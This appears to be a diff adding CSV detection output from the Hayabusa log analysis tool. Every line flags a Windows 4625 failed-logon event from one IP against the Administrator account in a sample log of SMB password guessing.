+2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dIfXRZQkKRJAw4er  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8wrqSJPALo5QtUnS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81Mm67AdwpPJMCMm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jwq5jXlMRU1SNLO5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d7OYj8ynCEl5dG9m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YzT8vF7ANYnjSRgd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: m4eYIoww4uL6oYZu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DpO8L2Fky4zYwp2q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jGmxSy48sphENTiY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tQVAkjteLFK0hbyE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UMWKsQ8l0j9fZPfA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2ct7xYUYH9sr7mva  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GBn0XxaPOZQokJ0Z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nQELRxrGuXqkYgO3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5eT0mykgLNZQygq9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qMyIqRidF6oBdzog  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ULnnFcF98k9zpNTl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j5k02pcelZNGwF3u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qfcC6LqJqs0EeGjE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mXALYkkitmyAFq14  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zIqQmExq22WrW4md  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ydHqjdZhLMI9gjfj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMSe45VZNPdovPbq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hiHlcR6qNGE0P7TK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iT3jPdHr89RqPlyd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0QFnABeYK39XEntR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5plMYSBQi5mKmdlk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5TaxWckQUCMgWvCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81xZ7iisEyTABmUm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qYiQ2xjMQFQwH2XY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eRN8e3yzZzxc2p3A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QCa6PN0C7XznvipG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hFqjIXbEb7eWUFUi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkrVjLgnJZlIyXpk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2r5tyuIYijAXN5be  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AgjQNe9hQrLIETDn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KRNoInpFTsixZDIu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ladJUS6I0HMIwdef  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6oW63pJlVtjgn3YY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xKNu8b2To2Y1twUr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9sN5xm3GytfmM7G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FtQQS61GYBm6WUUz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WxxawZZMhNCGHxc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sKP8G2VgJlrr9LMR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvOsNQpk3c5p1FgK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: H7oz7NPh5Z8UrDPW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VvzNFOLBlBv98Do4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8KJmYytO30Icc6Rb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zro3jLjFXWZ2o8VL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Z2J8VYeuxd9fKcG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXMjOKLfMex7OmMv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cgbm3YeoGxCa22Il  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7MEstBFjiWhVE18  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y8Y2kDEiMZWf0znn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zBAFVgPIOyCvtdRs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s3pFhUcspF6lzQXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 39LFXXW715pQoADC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: in4ewyxouUnxQzCQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zOtV8CLIU6Mcw2ty  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b8NJqimhGrg9uhTh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XEWLTOY9magV0h6L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Di1MZsJx52Bi8E6k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 22MdB2QodynfibkF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Qojej3YITXvXJ6Pe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CLjbQ6timbdQoufd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aZgoAnGEFwXN88bQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NZFWoL9XUMJdfNnY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x000TRnXfVtPAQSE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNHWWHDOpXQyNdrR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1irbPdOoUfvq1MXd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dCflbKOMPJRXQHsD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Zuy6nD4EXeGzEy5e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
